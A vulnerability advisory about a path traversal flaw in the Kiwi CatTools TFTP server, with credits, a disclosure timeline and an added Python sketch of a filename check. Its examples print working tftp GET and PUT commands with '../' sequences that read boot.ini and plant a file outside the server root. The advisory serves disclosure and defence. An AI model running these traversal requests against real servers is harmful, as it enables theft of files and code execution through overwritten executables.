Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8
server can lead to information disclosure and remote code execution
Risk: High
DISCUSSION
Kiwi CatTools TFTP server doesn't properly verify the filename in PUT
and GET requests, which can be used to download/upload any file from/to
the server. The default setting allows existing files to be replaced.
With this setting, an attacker may be able to replace executable files
and run code of the attacker's choice.
EXAMPLES
C:\>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt
Transfer successful: 212 bytes in 1 second, 212 bytes/s
C:\>type boot.txt
[boot loader] timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
C:\>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt
Transfer successful: 212 bytes in 1 second, 212 bytes/s
C:\>type pttest.txt
[boot loader] timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
C:\>
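The filename check whose absence the requests above demonstrate, sketched as an added example (not CatTools code and not part of the original advisory): it parses a TFTP read/write request, confines the name to the server root and refuses overwrites unless enabled. The function names, the router.cfg file and the overwrite-off default are assumptions made for illustration; the packets are constructed, two of them reusing the filenames shown above.

```python
import os
import tempfile

OP_RRQ, OP_WRQ = 1, 2  # TFTP opcodes (RFC 1350)

class TftpRequestError(Exception):
    """Request refused; the message is the text for the TFTP ERROR packet."""

def parse_request(packet):
    """Split an RRQ/WRQ packet into (opcode, filename)."""
    opcode = int.from_bytes(packet[:2], "big")
    fields = packet[2:].split(b"\x00")  # filename NUL mode NUL
    if opcode not in (OP_RRQ, OP_WRQ) or len(fields) < 3 or not fields[0]:
        raise TftpRequestError("illegal operation")  # error code 4
    return opcode, fields[0].decode("latin-1")

def resolve(root, opcode, filename, allow_overwrite=False):
    """Map the requested name to a path inside root, or refuse (hypothetical policy)."""
    # Both separators count, since the affected server runs on Windows.
    parts = [p for p in filename.replace("\\", "/").split("/") if p not in ("", ".")]
    if not parts or any(p == ".." or ":" in p for p in parts):
        raise TftpRequestError("access violation")  # error code 2
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, *parts))  # follows symlinks
    if not target.startswith(root_real + os.sep):
        raise TftpRequestError("access violation")
    if opcode == OP_WRQ and os.path.exists(target) and not allow_overwrite:
        raise TftpRequestError("file already exists")  # error code 6
    if opcode == OP_RRQ and not os.path.isfile(target):
        raise TftpRequestError("file not found")  # error code 1
    return target

def demo():
    """Check constructed requests against a temporary root directory."""
    samples = {  # constructed packets
        "get_traversal": b"\x00\x01/x/../../../../../boot.ini\x00octet\x00",
        "put_traversal": b"\x00\x02/x/../../../../../pttest.txt\x00octet\x00",
        "put_overwrite": b"\x00\x02router.cfg\x00octet\x00",
        "get_ok": b"\x00\x01router.cfg\x00octet\x00",
    }
    results = {}
    with tempfile.TemporaryDirectory() as root:
        open(os.path.join(root, "router.cfg"), "w").close()
        for name, pkt in samples.items():
            try:
                resolve(root, *parse_request(pkt))
                results[name] = "allowed"
            except TftpRequestError as exc:
                results[name] = str(exc)
    return results
```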
SOLUTION
Upgrade to CatTools 3.2.9 which is available for download at
http://www.kiwisyslog.com/downloads.php
CREDITS
Sergey Gordeychik of Positive Technologies (www.ptsecurity.com)
DISCLOSURE TIMELINE
Vulnerability discovered: 11/20/2006
Initial vendor contact: 12/08/2006
Patch released: 02/13/2007
Public disclosure: 02/27/2007